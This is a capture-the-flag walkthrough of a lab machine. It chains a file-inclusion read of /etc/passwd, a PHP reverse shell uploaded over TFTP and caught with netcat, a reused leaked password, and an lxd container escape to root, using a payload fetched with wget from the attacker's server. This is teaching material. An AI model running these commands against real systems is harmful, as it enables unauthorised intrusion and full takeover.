Enumeration
As usual, let's start with nmap:
nmap -sV -sC 10.129.166.191
Let's also do an udp scan too using:
sudo nmap -sU 10.129.166.191
Enter your password
udp scans takes a lot longer than the usual tcp scans, be patient. Also, udp scans require to use sudo
Note that port 69 udp is open, which is associated with tftp.
Port 80 is open, so let's check the website by going to : http://10.129.166.191
Even though I typed http://10.129.166.191, I got redirected to http://10.129.166.191/?file=home.php
This looks like file inclusion, explaining the name of the machine "included"
Let's try it. Let's see if we can access the file /etc/passwd using http://10.129.166.191/?file=/etc/passwd
Great!
Using curl, we can have a nicer display of users
curl http://10.129.166.191/?file=/etc/passwd
What is the /etc/passwd file?
The /etc/passwd file keeps track of all the registered users on the system. It is a colon-separated file ( : )
It contains, in this order, user name, encrypted password, UID, GID, user home directory, login shell
The file /etc/passwd is owned by the root user but must be readable by all users. Only root can write this file.
Then encrypted passwords are stored in /etc/security/passwd file
Earlier, we found from the udp scan that udp port 69/udp is open, which is associated with tftp
Let's install tftp first using:
sudo apt install tftpOnce installed, type:
tftp 10.129.166.191By default TFTP works without the need for authentication, meaning that anyone can upload and download files from the remote system!
Foothold
Open a new command prompt window and type:
locate webshells
cd /usr/share/webshells/php
ls
We are interested in php-reverse-shell.php. Let's make a copy first, called shell.php
sudo cp php-reverse-shell.php shell.phpls
Let's now move shell.php to our home directory
sudo mv shell.php /home/htb-sneakymouse/Your home directory will be different
Now open a new command prompt window and type:
ls
We can see shell.php is now here in our home directory
Now let's edit this shell.php file using:
sudo nano shell.phpScroll down until you see:
We need to change the $ip to the IP of our VM
if you don't know the IP of your VM, open a new command prompt window and type ifconfig
We need to change the $port to 4444 (this is because we will set up our netcat listener on port 4444)
When done, use:
Ctrl X
Press Y
Press enter
Now that we have shell.php ready, we need to upload it to the target using tftp. Go back to your tftp session and type:
put shell.phpMake sure you are in your home directory for the command above, as we will now upload shell.php
Now that we have uploaded our file we can just quit:
quit
Now let's open a new command prompt window and set up our netcat listener on port 4444
nc -lnvp 4444
Now go the url http://10.129.166.191/?file=/var/lib/tftpboot/shell.php
Nothing happens but this is triggering the shell.php file on the target machine. Now go back to your netcat and you should have a connection:
We got the shell! Let's upgrade the shell using:
python3 -c 'import pty;pty.spawn("/bin/bash")'
lswhoami
cd homels
cd mikelscat user.txt
We are www-data and we are not allowed to read user.txt in mike directory
Lateral movement
Let's look for some credentials in:
cd var/www/html
ls -al
.htpasswd is where we store the password for the website
cat .htpasswd
We got the password! Maybe mike is using the same password to access the system
Sheffield19
su mike
When prompted for the password, type:
Sheffield19
We got in and we are now Mike
id
cd /homelscd mikelscat user.txt
Congratulations! You got the user flag!
a56ef91d70cfbf2cdb8f454c006935a1
Privilege escalation
sudo -l
mike was not granted sudo right on the machine
id
Let's google lxd and lxd privilege escalation. We find that we can escalate our privileges using lxd. With lxd, we can run system containers. system containers are like a full OS, almost like a VM.
From you VM, open a new command prompt window and follow the steps below:
sudo apt install -y golang-go debootstrap rsync gpg squashfs-tools--> this installs the Go programming languages along with some other required packages
git clone https://github.com/lxc/distrobuilder
--> this downloads a copy of distrobuilder. We need distrobuilder to create container images for lxd
cd distrobuilder
make
--> distrobuilder has been built successfully!
Create a new directory called ContainerImages and a directory inside it called alpine using:
mkdir ContainerImagescd ContainerImagesmkdir alpinecd alpine
Let's also download the alpine.yaml file using:
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
ls
Let's now build it:
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.8when done you should have something like this
ls
we now have lxd.tar.xz and rootfs.squashfs
Let's create a web service on port 8000 on our VM using:
python3 -m http.server 8000
Now let's switch back to the shell on the target.
Type:
cd /tmp
wget http://10.10.14.82:8000/rootfs.squashfs
--> this go retrieve the rootfs.squashfs from the webserver we just created on our VM and download the file to the target machine
wget http://10.10.14.82:8000/lxd.tar.xz
--> this go retrieve the lxd.tar.xz from the webserver we just created on our VM and download the file to the target machine
ls
Now the files are on the target machine!
lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
--> this import the image and call it with the alias alpine
lxc image list
--> we use this command to make sure the image has been imported properly
lxc init alpine privesc -c security.privileged=true
lxc list
lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true
lxc start privesc
lxc exec privesc /bin/sh
We got a shell! not the prettiest shell but that will do!
cd /mnt/root/root
cat root.txt
Congratulations! You got the root flag!
cc693d9c7499d9f572ee375d4c14c7bcfca